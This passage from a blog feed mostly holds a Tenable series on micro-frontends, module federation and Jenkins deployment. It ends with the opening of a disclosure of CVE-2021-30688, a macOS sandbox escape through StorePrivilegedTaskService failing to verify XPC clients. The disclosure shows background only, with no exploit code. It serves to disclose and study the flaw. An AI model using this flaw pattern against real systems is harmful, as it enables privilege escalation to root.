You can easily imagine that as your application grows and your codebase gets larger and larger, this type of functionality can be extremely powerful since you only have to build the parts of the application related to what you’re working on. This allowed us to speed up our boot time by 2x and our rebuild time by 7x, which was a significant improvement.

Note: If you use Visual Studio, you can accomplish some of this same functionality through the NX Console extension.

Loading Your Micro-Apps — The Static Approach

In the previous article, when it came to importing and using Application 1 and 2, we simply imported the micro-apps at the top of the bootstrap file and hard coded the remote entries in the index.html file:

Application 1 & 2 are imported at the top of the file, which means they have to be loaded right away
The moment our app loads, it has to load in the remote entry files for each micro-app

However in the real world, this is not the best approach. By taking this approach, the moment your application runs, it is forced to load in the remote entry files for every single micro-app. For a real world application that has many micro-apps, this means the performance of your initial load will most likely be impacted. Additionally, loading in all the micro-apps as we’re doing in the index.html file above is not very flexible. Imagine some of your micro-apps are behind feature flags that only certain customers can access. In this case, it would be much better if the micro-apps could be loaded in dynamically only when a particular route is hit.

In our initial approach with this new architecture, we made this mistake and paid for it from a performance perspective. We noticed that as we added more micro-apps, our initial load was getting slower. We finally discovered the issue was related to the fact that we were loading in our remotes using this static approach.

Loading Your Micro-Apps — The Dynamic Approach

Leveraging the remote utilities we discussed above, you can see how we pass the remotes and their associated ports in the webpack build via the REMOTE_INFO property. This global property will be accessed later on in our code when it’s time to load the micro-apps dynamically.

Once we had the necessary information we needed for the remotes (via the REMOTE_INFO variable), we then updated our bootstrap.jsx file to leverage a new component we discuss below called <MicroApp />. The purpose of this component was to dynamically attach the remote entry to the page and then initialize the micro-app lazily so it could be leveraged by Host. You can see the actual component never gets loaded until we hit a path where it is needed. This ensures that a given micro-app is never loaded in until it’s actually needed, leading to a huge boost in performance.

The actual logic of the <MicroApp /> component is highlighted below. This approach is a variation of the example shown here. In a nutshell, this logic dynamically injects the <script src=”…remoteEntry.js”></script> tag into the index.html file when needed, and initializes the remote. Once initialized, the remote and any exposed component can be imported by the Host application like any other import.

Summary

By making the changes above, we were able to significantly improve our overall performance. We did this by only loading in the code we needed for a given micro-app at the time it was needed (versus everything at once). Additionally, when our team added a new micro-app, our script was capable of handling it automatically. This approach allowed our teams to work more efficiently, and allowed us to significantly reduce the initial load time of our application. See the next article to learn about how we dealt with our vendor libraries.


5. Module Federation — Managing Your Micro-Apps was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

6. Module Federation — Sharing Vendor Code

16 December 2021 at 17:16

Module Federation — Sharing Vendor Code

This is post 6 of 9 in the series

  1. Introduction
  2. Why We Implemented a Micro Frontend
  3. Introducing the Monorepo & NX
  4. Introducing Module Federation
  5. Module Federation — Managing Your Micro-Apps
  6. Module Federation — Sharing Vendor Code
  7. Module Federation — Sharing Library Code
  8. Building & Deploying
  9. Summary

Overview

This article focuses on the importance of sharing vendor library code between applications and some related best practices.

The Problem

One of the most important aspects of using module federation is sharing code. When a micro-app gets built, it contains all the files it needs to run. As stated by webpack, “These separate builds should not have dependencies between each other, so they can be developed and deployed individually”. In reality, this means if you build a micro-app and investigate the files, you will see that it has all the code it needs to run independently. In this article, we’re going to focus on vendor code (the code coming from your node_modules directory). However, as you’ll see in the next article of the series, this also applies to your custom libraries (the code living in libs). As illustrated below, App A and B both use vendor lib 6, and when these micro-apps are built they each contain a version of that library within their build artifact.

Why is this important? We’ll use the diagram below to demonstrate. Without sharing code between the micro-apps, when we load in App A, it loads in all the vendor libraries it needs. Then, when we navigate to App B, it also loads in all the libraries it needs. The issue is that we’ve already loaded in a number of libraries when we first loaded App A that could have been leveraged by App B (ex. Vendor Lib 1). From a customer perspective, this means they’re now pulling down a lot more Javascript than they should be.

The Solution

This is where module federation shines. By telling module federation what should be shared, the micro-apps can now share code between themselves when appropriate. Now, when we load App B, it’s first going to check and see what App A already loaded in and leverage any libraries it can. If it needs a library that hasn’t been loaded in yet (or the version it needs isn’t compatible with the version App A loaded in), then it proceeds to load its own. For example, App A needs Vendor lib 5, but since no other application is using that library, there’s no need to share it.

Sharing code between the micro-apps is critical for performance and ensures that customers are only pulling down the code they truly need to run a given application.

Diving Deeper

Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn more about sharing vendor code between your micro-apps. If you wish to see the code associated with the following section, you can check it out in this branch.

Now that we understand how libraries are built for each micro-app and why we should share them, let’s see how this actually works. The shared property of the ModuleFederationPlugin is where you define the libraries that should be shared between the micro-apps. Below, we are passing a variable called npmSharedLibs to this property:

If we print out the value of that variable, we’ll see the following:

This tells module federation that the three libraries should be shared, and more specifically that they are singletons. This means it could actually break our application if a micro-app attempted to load its own version. Setting singleton to true ensures that only one version of the library is loaded (note: this property will not be needed for most libraries). You’ll also notice we set a version, which comes from the version defined for the given library in our package.json file. This is important because anytime we update a library, that version will dynamically change. Libraries only get shared if they have a compatible version. You can read more about these properties here.

If we spin up the application and investigate the network traffic with a focus on the react library, we’ll see that only one file gets loaded in and it comes from port 3000 (our Host application). This is a result of defining react in the shared property:

Now let’s take a look at a vendor library that hasn’t been shared yet, called @styled-system/theme-get. If we investigate our network traffic, we’ll discover that this library gets embedded into a vendor file for each micro-app. The three files highlighted below come from each of the micro-apps. You can imagine that as your libraries grow, the size of these vendor files may get quite large, and it would be better if we could share these libraries.

We will now add this library to the shared property:

If we investigate the network traffic again and search for this library, we’ll see it has been split into its own file. In this case, the Host application (which loads before everything else) loads in the library first (we know this since the file is coming from port 3000). When the other applications load in, they determine that they don’t have to use their own version of this library since it’s already been loaded in.

This very significant feature of module federation is critical for an architecture like this to succeed from a performance perspective.

Summary

Sharing code is one of the most important aspects of using module federation. Without this mechanism in place, your application would suffer from performance issues as your customers pull down a lot of duplicate code each time they accessed a different micro-app. Using the approaches above, you can ensure that your micro-apps are both independent but also capable of sharing code between themselves when appropriate. This the best of the both worlds, and is what allows a micro-frontend architecture to succeed. Now that you understand how vendor libraries are shared, we can take the same principles and apply them to our self-created libraries that live in the libs directory, which we discuss in the next article of the series.


6. Module Federation — Sharing Vendor Code was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

7. Module Federation — Sharing Library Code

16 December 2021 at 18:44

Module Federation — Sharing Library Code

This is post 7 of 9 in the series

  1. Introduction
  2. Why We Implemented a Micro Frontend
  3. Introducing the Monorepo & NX
  4. Introducing Module Federation
  5. Module Federation — Managing Your Micro-Apps
  6. Module Federation — Sharing Vendor Code
  7. Module Federation — Sharing Library Code
  8. Building & Deploying
  9. Summary

Overview

This article focuses on the importance of sharing your custom library code between applications and some related best practices.

The Problem

As discussed in the previous article, sharing code is critical to using module federation successfully. In the last article we focused on sharing vendor code. Now, we want to take those same principles and apply them to the custom library code we have living in the libs directory. As illustrated below, App A and B both use Lib 1. When these micro-apps are built, they each contain a version of that library within their build artifact.

Assuming you read the previous article, you now know why this is important. As shown in the diagram below, when App A is loaded in, it pulls down all the libraries shown. When App B is loaded in it’s going to do the same thing. The problem is once again that App B is pulling down duplicate libraries that App A has already loaded in.

The Solution

Similar to the vendor libraries approach, we need to tell module federation that we would like to share these custom libraries. This way once we load in App B, it’s first going to check and see what App A has already loaded and leverage any libraries it can. If it needs a library that hasn’t been loaded in yet (or the version it needs isn’t compatible with the version App A loaded in), then it will proceed to load on its own. Otherwise, if it’s the only micro-app using that library, it will simply bundle a version of that library within itself (ex. Lib 2).

Diving Deeper

Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn more about sharing custom library code between your micro-apps. If you wish to see the code associated with the following section, you can check it out in this branch.

To demonstrate sharing libraries, we’re going to focus on Test Component 1 that is imported by the Host and Application 1:

This particular component lives in the design-system/components workspace:

We leverage the tsconfig.base.json file to build out our aliases dynamically based on the component paths defined in that file. This is an easy way to ensure that as new paths are added to your libraries, they are automatically picked up by webpack:

The aliases in our webpack.config are built dynamically based off the paths in the tsconfig.base.json file

How does webpack currently treat this library code? If we were to investigate the network traffic before sharing anything, we would see that the code for this component is embedded in two separate files specific to both Host and Application 1 (the code specific to Host is shown below as an example). At this point the code is not shared in any way and each application simply pulls the library code from its own bundle.

As your application grows, so does the amount of code you share. At a certain point, it becomes a performance issue when each application pulls in its own unique library code. We’re now going to update the shared property of the ModuleFederationPlugin to include these custom libraries.

Sharing our libraries is similar to the vendor libraries discussed in the previous article. However, the mechanism of defining a version is different. With vendor libraries, we were able to rely on the versions defined in the package.json file. For our custom libraries, we don’t have this concept (though you could technically introduce something like that if you wanted). To solve this problem, we decided to use a unique identifier to identify the library version. Specifically, when we build a particular library, we actually look at the folder containing the library and generate a unique hash based off of the contents of the directory. This way, if the contents of the folder change, then the version does as well. By doing this, we can ensure micro-apps will only share custom libraries if the contents of the library match.

We leverage the hashElement method from folder-hash library to create our hash ID
Each lib now has a unique version based on the hash ID generated

Note: We are once again leveraging the tsconfig.base.json to dynamically build out the libs that should be shared. We used a similar approach above for building out our aliases.

If we investigate the network traffic again and look for libs_design-system_components (webpack’s filename for the import from @microfrontend-demo/design-system/components), we can see that this particular library has now been split into its own individual file. Furthermore, only one version gets loaded by the Host application (port 3000). This indicates that we are now sharing the code from @microfrontend-demo/design-system/components between the micro-apps.

Going More Granular

Before You Proceed: If you wish to see the code associated with the following section, you can check it out in this branch.

Currently, when we import one of the test components, it comes from the index file shown below. This means the code for all three of these components gets bundled together into one file shown above as “libs_design-system_components_src_index…”.

Imagine that we continue to add more components:

You may get to a certain point where you think it would be beneficial to not bundle these files together into one big file. Instead, you want to import each individual component. Since the alias configuration in webpack is already leveraging the paths in the tsconfig.base.json file to build out these aliases dynamically (discussed above), we can simply update that file and provide all the specific paths to each component:

We can now import each one of these individual components:

If we investigate our network traffic, we can see that each one of those imports gets broken out into its own individual file:

This approach has several pros and cons that we discovered along the way:

Pros

  • Less Code To Pull Down — By making each individual component a direct import and by listing the component in the shared array of the ModuleFederationPlugin, we ensure that the micro-apps share as much library code as possible.
  • Only The Code That Is Needed Is Used — If a micro-app only needs to use one or two of the components in a library, they aren’t penalized by having to import a large bundle containing more than they need.

Cons

  • Performance — Bundling, the process of taking a number of separate files and consolidating them into one larger file, is a really good thing. If you continue down the granular path for everything in your libraries, you may very well find yourself in a scenario where you are importing hundreds of files in the browser. When it comes to browser performance and caching, there’s a balance to loading a lot of small granular files versus a few larger ones that have been bundled.

We recommend you choose the solution that works best based on your codebase. For some applications, going granular is an ideal solution and leads to the best performance in your application. However, for another application this could be a very bad decision, and your customers could end up having to pull down a ton of granular files when it would have made more sense to only have them pull down one larger file. So as we did, you’ll want to do your own performance analysis and use that as the basis for your approach.

Pitfalls

When it came to the code in our libs directory, we discovered two important things along the way that you should be aware of.

Hybrid Sharing Leads To Bloat — When we first started using module federation, we had a library called tenable.io/common. This was a relic from our initial architecture and essentially housed all the shared code that our various applications used. Since this was originally a directory (and not a library), our imports from it varied quite a bit. As shown below, at times we imported from the main index file of tenable-io/common (tenable-io/common.js), but in other instances we imported from sub directories (ex. tenable-io/common/component.js) and even specific files (tenable-io/component/component1.js). To avoid updating all of these import statements to use a consistent approach (ex. only importing from the index of tenable-io/common), we opted to expose every single file in this directory and shared it via module federation.

To demonstrate why this was a bad idea, we’ll walk through each of these import types: starting from the most global in nature (importing the main index file) and moving towards the most granular (importing a specific file). As shown below, the application begins by importing the main index file which exposes everything in tenable-io/common. This means that when webpack bundles everything together, one large file is created for this import statement that contains everything (we’ll call it common.js).

We then move down a level in our import statements and import from subdirectories within tenable-io/common (components and utilities). Similar to our main index file, these import statements contain everything within their directories. Can you see the problem? This code is already contained in the common.js file above. We now have bloat in our system that causes the customer to pull down more javascript than necessary.

We now get to the most granular import statement where we’re importing from a specific file. At this point, we have a lot of bloat in our system as these individual files are already contained within both import types above.

As you can imagine, this can have a dramatic impact on the performance of your application. For us, this was evident in our application early on and it was not until we did a thorough performance analysis that we discovered the culprit. We highly recommend you evaluate the structure of your libraries and determine what’s going to work best for you.

Sharing State/Storage/Theme — While we tried to keep our micro-apps as independent of one another as possible, we did have instances where we needed them to share state and theming. Typically, shared code lives in an actual file (some-file.js) that resides within a micro-app’s bundle. For example, let’s say we have a notifications library shared between the micro-apps. In the first update, the presentation portion of this library is updated. However, only App B gets deployed to production with the new code. In this case, that’s okay because the code is constrained to an actual file. In this instance, App A and B will use their own versions within each of their bundles. As a result, they can both operate independently without bugs.

However, when it comes to things like state (Redux for us), storage (window.storage, document.cookies, etc.) and theming (styled-components for us), you cannot rely on this. This is because these items live in memory and are shared at a global level, which means you can’t rely on them being confined to a physical file. To demonstrate this, let’s say that we’ve made a change to the way state is getting stored and accessed. Specifically, we went from storing our notifications under an object called notices to storing them under notifications. In this instance, once our applications get out of sync on production (i.e. they’re not leveraging the same version of shared code where this change was made), the applications will attempt to store and access notifications in memory in two different ways. If you are looking to create challenging bugs, this is a great way to do it.

As we soon discovered, most of our bugs/issues resulting from this new architecture came as a result of updating one of these areas (state, theme, storage) and allowing the micro-apps to deploy at their own pace. In these instances, we needed to ensure that all the micro-apps were deployed at the same time to ensure the applications and the state, store, and theming were all in sync. You can read more about how we handled this via a Jenkins bootstrapper job in the next article.

Summary

At this point you should have a fairly good grasp on how both vendor libraries and custom libraries are shared in the module federation system. See the next article in the series to learn how we build and deploy our application.


7. Module Federation — Sharing Library Code was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

8. Building & Deploying

16 December 2021 at 18:45

Building & Deploying

This is post 8 of 9 in the series

  1. Introduction
  2. Why We Implemented a Micro Frontend
  3. Introducing the Monorepo & NX
  4. Introducing Module Federation
  5. Module Federation — Managing Your Micro-Apps
  6. Module Federation — Sharing Vendor Code
  7. Module Federation — Sharing Library Code
  8. Building & Deploying
  9. Summary

Overview

This article documents the final phase of our new architecture where we build and deploy our application utilizing our new micro-frontend model.

The Problem

If you have followed along up until this point, you can see how we started with a relatively simple architecture. Like a lot of companies, our build and deployment flow looked something like this:

  1. An engineer merges their code to master.
  2. A Jenkins build is triggered that lints, tests, and builds the entire application.
  3. The built application is then deployed to a QA environment.
  4. End-2-End (E2E) tests are run against the QA environment.
  5. The application is deployed to production. If it’s a CICD flow this occurs automatically if E2E tests pass, otherwise this would be a manual deployment.

In our new flow this would no longer work. In fact, one of our biggest challenges in implementing this new architecture was in setting up the build and deployment process to transition from a single build (as demonstrated above) to multiple applications and libraries.

The Solution

Our new solution involved three primary Jenkins jobs:

  1. Seed Job — Responsible for identifying what applications/libraries needed to be rebuilt (via the nx affected command). Once this was determined, its primary purpose was to then kick off n+ of the next two jobs discussed.
  2. Library Job — Responsible for linting and testing any library workspace that was impacted by a change.
  3. Micro-App Jobs — A series of jobs pertaining to each micro-app. Responsible for linting, testing, building, and deploying the micro-app.

With this understanding in place, let’s walk through the steps of the new flow:

Phase 1 — In our new flow, phase 1 includes building and deploying the code to our QA environments where it can be properly tested and viewed by our various internal stakeholders (engineers, quality assurance, etc.):

  1. An engineer merges their code to master. In the diagram below, an engineer on Team 3 merges some code that updates something in their application (Application C).
  2. The Jenkins seed job is triggered, and it identifies what applications and libraries were impacted by this change. This job now kicks off an entirely independent pipeline related to the updated application. In this case, it kicked off the Application C pipeline in Jenkins.
  3. The pipeline now lints, tests, and builds Application C. It’s important to note here how it’s only dealing with a piece of the overall application. This greatly improves the overall build times and avoids long queues of builds waiting to run.
  4. The built application is then deployed to the QA environments.
  5. End-2-End (E2E) tests are run against the QA environments.
  6. Our deployment is now complete. For our purposes, we felt that a manual deployment to production was a safe approach for us and one that still offered us the flexibility and efficiency we needed.
Phase 1 Highlighted — Deploying to QA environments

Phase 2 — This phase (shown in the diagram after the dotted line) occurred when an engineer was ready to deploy their code to production:

  1. An engineer deployed their given micro-app to staging. In this case, the engineer would go into the build for Application C and deploy from there.
  2. For our purposes, we deployed to a staging environment before production to perform a final spot check on our application. In this type of architecture, you may only encounter a bug related to the decoupled nature of your micro-apps. You can read more about this type of issue in the previous article under the Sharing State/Storage/Theme section. This final staging environment allowed us to catch these issues before they made their way to production.
  3. The application is then deployed to production.
Phase 2 Highlighted — Deploying to production environments

While this flow has more steps than our original one, we found that the pros outweigh the cons. Our builds are now more efficient as they can occur in parallel and only have to deal with a specific part of the repository. Additionally, our teams can now move at their own pace, deploying to production when they see fit.

Diving Deeper

Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn the specifics of how we build and deploy our applications.

Build Strategy

We will now discuss the three job types discussed above in more detail. These include the following: seed job, library job, and micro-app jobs.

The Seed Job

This job is responsible for first identifying what applications/libraries needed to be rebuilt. How is this done? We will now come full circle and understand the importance of introducing the NX framework that we discussed in a previous article. By taking advantage of this framework, we created a system by which we could identify which applications and libraries (our “workspaces”) were impacted by a given change in the system (via the nx affected command). Leveraging this functionality, the build logic was updated to include a Jenkins seed job. A seed job is a normal Jenkins job that runs a Job DSL script and in turn, the script contains instructions that create and trigger additional jobs. In our case, this included micro-app jobs and/or a library job which we’ll discuss in detail later.

Jenkins Status — An important aspect of the seed job is to provide a visualization for all the jobs it kicks off. All the triggered application jobs are shown in one place along with their status:

  • Green — Successful build
  • Yellow — Unstable
  • Blue — Still processing
  • Red (not shown) — Failed build

Github Status — Since multiple independent Jenkins builds are triggered for the same commit ID, we had to pay attention to the representation of the changes in GitHub to not lose visibility of broken builds in the PR process. Each job registers itself with a unique context with respect to github, providing feedback on what sub-job failed directly in the PR process:

Performance, Managing Dependencies — Before a given micro-app and/or library job can perform its necessary steps (lint, test, build), it needs to install the necessary dependencies for those actions (those defined in the package.json file of the project). Doing this every single time a job is run is very costly in terms of resources and performance. Since all of these jobs need the same dependencies, it makes much more sense if we can perform this action once so that all the jobs can leverage the same set of dependencies.

To accomplish this, the node execution environment was dockerised with all necessary dependencies installed inside a container. As shown below, the seed job maintains the responsibility for keeping this container in sync with the required dependencies. The seed job determines if a new container is required by checking if changes have been made to package.json. If changes are made, the seed job generates the new container prior to continuing any further analysis and/or build steps. The jobs that are kicked off by the seed (micro-app jobs and the library job) can then leverage that container for use:

This approach led to the following benefits:

  • Proved to be much faster than downloading all development dependencies for each build (step) every time needed.
  • The use of a pre-populated container reduced the load on the internal Nexus repository manager as well as the network traffic.
  • Allowed us to run the various build steps (lint, unit test, package) in parallel thus further improving the build times.

Performance, Limiting The Number Of Builds Run At Once — To facilitate the smooth operation of the system, the seed jobs on master and feature branch builds use slightly different logic with respect to the number of builds that can be kicked off at any one time. This is necessary as we have a large number of active development branches and triggering excessive jobs can lead to resource shortages, especially with required agents. When it comes to the concurrency of execution, the differences between the two are:

  • Master branch — Commits immediately trigger all builds concurrently.
  • Feature branches — Allow only one seed job per branch to avoid system overload as every commit could trigger 10+ sub jobs depending on the location of the changes.

Another attempt to reduce the amount of builds generated is the way in which the nx affected command gets used by the master branch versus the feature branches:

  • Master branch — Will be called against the latest tag created for each application build. Each master / production build produces a tag of the form APP<uniqueAppId>_<buildversion>. This is used to determine if the specific application needs to be rebuilt based on the changes.
  • Feature branches — We use master as a reference for the first build on the feature branch, and any subsequent build will use the commit-id of the last successful build on that branch. This way, we are not constantly rebuilding all applications that may be affected by a diff against master, but only the applications that are changed by the commit.

To summarize the role of the seed job, the diagram below showcases the logical steps it takes to accomplish the tasks discussed above.

The Library Job

We will now dive into the jobs that Seed kicks off, starting with the library job. As discussed in our previous articles, our applications share code from a libs directory in our repository.

Before we go further, it’s important to understand how library code gets built and deployed. When a micro-app is built (ex. nx build host), its deployment package contains not only the application code but also all the libraries that it depends on. When we build the Host and Application 1, it creates a number of files starting with “libs_…” and “node_modules…”. This demonstrates how all the shared code (both vendor libraries and your own custom libraries) needed by a micro-app is packaged within (i.e. the micro-apps are self-reliant). While it may look like your given micro-app is extremely bloated in terms of the number of files it contains, keep in mind that a lot of those files may not actually get leveraged if the micro-apps are sharing things appropriately.

This means building the actual library code is a part of each micro-app’s build step, which is discussed below. However, if library code is changed, we still need a way to lint and test that code. If you kicked off 5 micro-app jobs, you would not want each of those jobs to perform this action as they would all be linting and testing the exact same thing. Our solution to this was to have a separate Jenkins job just for our library code, as follows:

  1. Using the nx affected:libs command, we determine which library workspaces were impacted by the change in question.
  2. Our library job then lints/tests those workspaces. In parallel, our micro-apps also lint, test and build themselves.
  3. Before a micro-app can finish its job, it checks the status of the libs build. As long as the libs build was successful, it proceeds as normal. Otherwise, all micro-apps fail as well.

The Micro-App Jobs

Now that you understand how the seed and library jobs work, let’s get into the last job type: the micro-app jobs.

Configuration — As discussed previously, each micro-app has its own Jenkins build. The build logic for each application is implemented in a micro-app specific Jenkinsfile that is loaded at runtime for the application in question. The pattern for these small snippets of code looks something like the following:

The jenkins/Jenkinsfile.template (leveraged by each micro-app) defines the general build logic for a micro-application. The default configuration in that file can then be overwritten by the micro-app:

This approach allows all our build logic to be in a single place, while easily allowing us to add more micro-apps and scale accordingly. This combined with the job DSL makes adding a new application to the build / deployment logic a straightforward and easy to follow process.

Managing Parallel Jobs — When we first implemented the build logic for the jobs, we attempted to implement as many steps as possible in parallel to make the builds as fast as possible, which you can see in the Jenkins parallel step below:

After some testing, we found that linting + building the application together takes about as much time as running the unit tests for a given product. As a result, we combined the two steps (linting, building) into one (assets-build) to optimize the performance of our build. We highly recommend you do your own analysis, as this will vary per application.

Deployment strategy

Now that you understand how the build logic works in Jenkins, let’s see how things actually get deployed.

Checkpoints — When an engineer is ready to deploy their given micro-app to production, they use a checkpoint. Upon clicking into the build they wish to deploy, they select the checkpoints option. As discussed in our initial flow diagram, we force our engineers to first deploy to our staging environment for a final round of testing before they deploy their application to production.

The particular build in Jenkins that we wish to deploy
The details of the job above where we have the ability to deploy to staging via a checkpoint

Once approval is granted, the engineer can then deploy the micro-app to production using another checkpoint:

The build in Jenkins that was created after we clicked deployToQAStaging
The details of the job above where we have the ability to deploy to production via a checkpoint

S3 Strategy — The new logic required a rework of the whole deployment strategy as well. In our old architecture, the application was deployed as a whole to a new S3 location and then the central gateway application was informed of the new location. This forced the clients to reload the entire application as a whole.

Our new strategy reduces the deployment impact to the customer by only updating the code on S3 that actually changed. This way, whenever a customer pulls down the code for the application, they are pulling a majority of the code from their browser cache and only updated files have to be brought down from S3.

One thing we had to be careful about was ensuring the index.html file is only updated after all the granular files are pushed to S3. Otherwise, we run the risk of our updated application requesting files that may not have made their way to S3 yet.

Bootstrapper Job — As discussed above, micro-apps are typically deployed to an environment via an individual Jenkins job:

However, we ran into a number of instances where we needed to deploy all micro-apps at the same time. This included the following scenarios:

  • Shared state — While we tried to keep our micro-apps as independent of one another as possible, we did have instances where we needed them to share state. When we made updates to these areas, we could encounter bugs when the apps got out of sync.
  • Shared theme — Since we also had a global theme that all micro-apps inherited from, we could encounter styling issues when the theme was updated and apps got out of sync.
  • Vendor Library Update — Updating a vendor library like react where there could be only one version of the library loaded in.

To address these issues, we created the bootstrapper job. This job has two steps:

  1. Build — The job is run against a specific environment (qa-development, qa-staging, etc.) and pulls down a completely compiled version of the entire application.
  2. Deploy — The artifact from the build step can then be deployed to the specified environment.

Conclusion

Our new build and deployment flow was the final piece of our new architecture. Once it was in place, we were able to successfully deploy individual micro-apps to our various environments in a reliable and efficient manner. This was the final phase of our new architecture, please see the last article in this series for a quick recap of everything we learned.


8. Building & Deploying was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

9. Wrapping Up Our Journey Implementing a Micro Frontend

16 December 2021 at 18:46

Wrapping Up Our Journey Implementing a Micro Frontend

We hope you now have a better understanding of how you can successfully create a micro-front end architecture. Before we call it a day, let’s give a quick recap of what was covered.

What You Learned

  • Why We implemented a micro front end architecture — You learned where we started, specifically what our architecture used to look like and where the problems existed. You then learned how we planned on solving those problems with a new architecture.
  • Introducing the Monorepo and NX — You learned how we combined two of our repositories into one: a monorepo. You then saw how we leveraged the NX framework to identify which part of the repository changed, so we only needed to rebuild that portion.
  • Introducing Module Federation — You learned how we leverage webpacks module federation to break our main application into a series of smaller applications called micro-apps, the purpose of which was to build and deploy these applications independently of one another.
  • Module Federation — Managing Your Micro-Apps — You learned how we consolidated configurations and logic pertaining to our micro-apps so we could easily manage and serve them as our codebase continued to grow.
  • Module Federation — Sharing Vendor Code — You learned the importance of sharing vendor library code between applications and some related best practices.
  • Module Federation — Sharing Library Code — You learned the importance of sharing custom library code between applications and some related best practices.
  • Building and Deploying — You learned how we build and deploy our application using this new model.

Key Takeaways

If you take anything away from this series, let it be the following:

The Earlier, The Better

We can tell you from experience that implementing an architecture like this is much easier if you have the opportunity to start from scratch. If you are lucky enough to start from scratch when building out an application and are interested in a micro-frontend, laying the foundation before anything else is going to make your development experience much better.

Evaluate Before You Act

Before you decide on an architecture like this, make sure it’s really what you want. Take the time to assess your issues and how your company operates. Without company support, pulling off this approach is extremely difficult.

Only Build What Changed

Using a tool like NX is critical to a monorepo, allowing you to only rebuild those parts of the system that were impacted by a change.

Micro-front Ends Are Not For Everyone

We know this type of architecture is not for everyone, and you should truly consider what your organization needs before going down this path. However, it has been very rewarding for us, and has truly transformed how we deliver solutions to our customers.

Don’t Forget To Share

When it comes to module federation, sharing is key. Learning when and how to share code is critical to the successful implementation of this architecture.

Be Careful Of What You Share

Sharing things like state between your micro-apps is a dangerous thing in a micro-frontend architecture. Learning to put safeguards in place around these areas is critical, as well as knowing when it might be necessary to deploy all your applications at once.

Summary

We hope you enjoyed this series and learned a thing or two about the power of NX and module federation. If this article can help just one engineer avoid a mistake we made, then we’ll have done our job. Happy coding!


9. Wrapping Up Our Journey Implementing a Micro Frontend was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Sandbox escape + privilege escalation in StorePrivilegedTaskService

21 December 2021 at 00:00

CVE-2021-30688 is a vulnerability which was fixed in macOS 11.4 that allowed a malicious application to escape the Mac Application Sandbox and to escalate its privileges to root. This vulnerability required a strange exploitation path due to the sandbox profile of the affected service.

Background

At rC3 in 2020 and HITB Amsterdam 2021 Daan Keuper and Thijs Alkemade gave a talk on macOS local security. One of the subjects of this talk was the use of privileged helper tools and the vulnerabilities commonly found in them. To summarize, many applications install a privileged helper tool in order to install updates for the application. This allows normal (non-admin) users to install updates, which is normally not allowed due to the permissions on /Applications. A privileged helper tool is a service which runs as root which used for only a specific task that needs root privileges. In this case, this could be installing a package file.

Many applications that use such a tool contain two vulnerabilities that in combination lead to privilege escalation:

  1. Not verifying if a request to install a package comes from the main application.
  2. Not correctly verifying the authenticity of an update package.

As it turns out, the first issue not only affects third-party developers, but even Apple itself! Although in a slightly different way…

About StorePrivilegedTaskService

StorePrivilegedTaskService is a tool used by the Mac App Store to perform certain privileged operations, such as removing the quarantine flag of downloaded files, moving files and adding App Store receipts. It is an XPC service embedded in the AppStoreDaemon.framework private framework.

To explain this vulnerability, it would be best to first explain XPC services and Mach services, and the difference between those two.

First of all, XPC is an inter-process communication technology developed by Apple which is used extensively to communicate between different processes in all of Apple’s operating systems. In iOS, XPC is a private API, usable only indirectly by APIs that need to communicate with other processes. On macOS, developers can use it directly. One of the main benefits of XPC is that it sends structured data, supporting many data types such as integers, strings, dictionaries and arrays. This can in many cases avoid the use of serialization functions, which reduces the possibility of vulnerabilities due to parser bugs.

XPC services

An XPC service is a lightweight process related to another application. These are launched automatically when an application initiates an XPC connection and terminated after they are no longer used. Communication with the main process happens (of course) over XPC. The main benefit of using XPC services is the ability to separate dangerous operations or privileges, because the XPC service can have different entitlements.

For example, suppose an application needs network functionality for only one feature: to download a fixed URL. This means that when sandboxing the application, it would need full network client access (i.e. the com.apple.security.network.client entitlement). A vulnerability in this application can then also use the network access to send out arbitrary network traffic. If the functionality for performing the request would be moved to a different XPC service, then only this service would need the network permission. Compromising the main application would only allow it to retrieve that URL and compromising the XPC service would be unlikely, as it requires very little code. This pattern is how Apple uses these services throughout the system.

These services can have one of 3 possible service types:

  • Application: each application initiating a connection to an XPC service spawns a new process (though multiple connections from one application are still handled in the same process).
  • User: per user only one instance of an XPC service is running, handling requests from all applications running as that user.
  • System: only one instance of the XPC service is running and it runs as root. Only available for Apple’s own XPC services.

Mach services

While XPC services are local to an application, Mach services are accessible for XPC connections system wide by registering a name. A common way to register this name is through a launch agent or launch daemon config file. This can launch the process on demand, but the process is not terminated automatically when no longer in use, like XPC services are.

For example, some of the mach services of lsd:

/System/Library/LaunchDaemons/com.apple.lsd.plist:

<key>MachServices</key>
	<dict>
		<key>com.apple.lsd.advertisingidentifiers</key>
		<true/>
		<key>com.apple.lsd.diagnostics</key>
		<true/>
		<key>com.apple.lsd.dissemination</key>
		<true/>
		<key>com.apple.lsd.mapdb</key>
		<true/>
	...

Connecting to an XPC service using the NSXPCConnection API:

[[NSXPCConnection alloc] initWithServiceName:serviceName];

while connecting to a mach service:

[[NSXPCConnection alloc] initWithMachServiceName:name options:options];

NSXPCConnection is a higher-level Objective-C API for XPC connections. When using it, an object with a list of methods can be made available to the other end of the connection. The connecting client can call these methods just like it would call any normal Objective-C methods. All serialization of objects as arguments is handled automatically.

Permissions

XPC services in third-party applications rarely have interesting permissions to steal compared to a non-sandboxed application. Sanboxed services can have entitlements that create sandbox exceptions, for example to allow the service to access the network. Compared to a non-sandboxed application, these entitlements are not interesting to steal because the app is not sandboxed. TCC permissions are also usually set for the main application, not its XPC services (as that would generate rather confusing prompts for the end user).

A non-sandboxed application can therefore almost never gain anything by connecting to the XPC service of another application. The template for creating a new XPC service in Xcode does not even include a check on which application has connected!

This does, however, appear to give developers a false sense of security because they often do not add a permission check to Mach services either. This leads to the privileged helper tool vulnerabilities discussed in our talk. For Mach services running as root, a check on which application has connected is very important. Otherwise, any application could connect to the Mach service to request it to perform its operations.

StorePrivilegedTaskService vulnerability

Sandbox escape

The main vulnerability in the StorePrivilegedTaskService XPC service was that it did not check the application initiating the connection. This service has a service type of System, so it would launch as root.

This vulnerability was exploitable due to defense-in-depth measures which were ineffective:

